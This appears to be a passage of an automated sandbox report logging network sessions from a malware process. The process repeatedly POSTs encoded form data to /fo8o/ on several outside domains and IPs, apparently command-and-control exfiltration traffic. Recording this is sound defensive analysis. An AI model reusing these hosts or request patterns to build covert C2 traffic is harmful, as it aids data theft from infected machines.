                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449745116.50.37.244803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:53:58.672393084 CET818OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 63 55 32 51 74 42 4f 62 47 4e 6b 77 72 32 43 59 67 38 41 68 2b 2f 4a 67 36 67 70 45 6a 72 56 55 3d
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPcU2QtBObGNkwr2CYg8Ah+/Jg6gpEjrVU=
                                                                              Nov 21, 2024 12:54:00.241486073 CET492INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:53:59 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449751116.50.37.244803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:01.326410055 CET10900OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.goldenjade-travel.com
                                                                              Origin: http://www.goldenjade-travel.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.goldenjade-travel.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 31 6c 5a 52 68 6e 6e 47 47 38 30 5a 50 75 46 57 32 34 52 38 33 5a 36 75 7a 68 41 38 70 49 79 36 71 70 35 32 67 37 47 6f 59 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 48 4b 75 73 68 32 58 31 32 56 6f 59 48 76 33 4f 77 2b 5a 55 2b 78 63 32 41 71 79 6c 65 38 74 45 58 6b 41 56 2f 49 78 6b 4a 66 6b 30 51 50 51 44 61 69 4c 6c 4c 55 6a 37 41 31 6e 65 50 54 4a 73 75 48 61 37 32 65 43 66 48 68 58 7a 6f 45 72 62 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xL1lZRhnnGG80ZPuFW24R83Z6uzhA8pIy6qp52g7GoYSYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuHKush2X12VoYHv3Ow+ZU+xc2Aqyle8tEXkAV/IxkJfk0QPQDaiLlLUj7A1nePTJsuHa72eCfHhXzoErbJI7p0dZ0pvtJLPZCNBbfkZZuwld9LpKhkNEJcSFOpl0hwuQzM9OQ/06997bt03YSdIl1xfzR1paiBmgpgShwwcgWK2BHOIJ9pQzQmp/aD7JQSgbpKyX1LMz97dC3vpXT3T1LmfKc9RuG9FmNkX7rQVVFILVYi6fvP8mkfpU7Ub0LSpcQNjipOC0C/C+nZq/IVMWXhXRD53Din+vxQqiZwpVUJitjjiixIvySAQTu7i2pB2AbFWoNuRZF040YNoZpACYJlJyTbOftlZduaTAPmKC17B0A12pI4KZk94p8f7ouqcGtZpOv+7FgBiooP+OK41b6hivVy32G5UaAEsxSpFLYPJBxa1ZdR+vlj9IPg+HYBFaY3ZcsS4vBiQvd8+YEtGOTttG4kJLaib5p9RHFexGC5PDr6OwcxU/+X6wqyXE4SSRslpqvOvtYg54LeLHsKS7XiPqU35EdT52sfLN1AkWYVAqSNJ48HgNyqyX76+L+QJcUICRB5XPJiCkT4c5xhxV5sZh8T14Qm+BCAWAVGAb8okuU5+LbGl0CaMHYmni6NYZMRIBwwGzlHkVarquRdNwmCte0coo2aX+9i/xOFsUkIK3Ux/fgJ2rn0ElRR0LKiSxqU/5yT+uC1HI1lkflUrMhIcrcSKK5VXxofzw1KR7NuTOVYykvxW [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449762116.50.37.244803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:03.967367887 CET514OUTGET /fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.goldenjade-travel.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:54:05.481537104 CET492INHTTP/1.1 404 Not Found
                                                                              Content-Type: text/html; charset=us-ascii
                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                              Date: Thu, 21 Nov 2024 11:54:04 GMT
                                                                              Connection: close
                                                                              Content-Length: 315
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.44979385.159.66.93803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:19.241039038 CET777OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 6b 37 45 61 72 56 62 45 53 75 75 52 42 67 2b 62 76 78 5a 38 35 44 44 61 79 53 41 48 58 4c 67 73 77 3d 3d
                                                                              Data Ascii: SHqP-p=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.44980085.159.66.93803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:21.889743090 CET797OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6e 77 48 31 62 30 4b 55 32 70 33 31 34 55 71 54 73 4a 79 47 36 4e 68 6e 69 4b 2b 6f 68 44 4d 49 4d 3d
                                                                              Data Ascii: SHqP-p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.44981085.159.66.93803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:24.547323942 CET10879OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.magmadokum.com
                                                                              Origin: http://www.magmadokum.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.magmadokum.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ8E [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.44981685.159.66.93803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:54:27.206227064 CET507OUTGET /fo8o/?0xilO=7vZpwBG&SHqP-p=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.magmadokum.com
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:55:28.530539036 CET194INHTTP/1.0 504 Gateway Time-out
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.44996191.195.240.94803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:55:33.929876089 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.rssnewscast.com
                                                                              Origin: http://www.rssnewscast.com
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.rssnewscast.com/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                              Data Ascii: SHqP-p=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                              Nov 21, 2024 12:55:35.249577045 CET707INHTTP/1.1 405 Not Allowed
                                                                              date: Thu, 21 Nov 2024 11:55:35 GMT
                                                                              content-type: text/html
                                                                              content-length: 556
                                                                              server: Parking/1.0
                                                                              connection: close
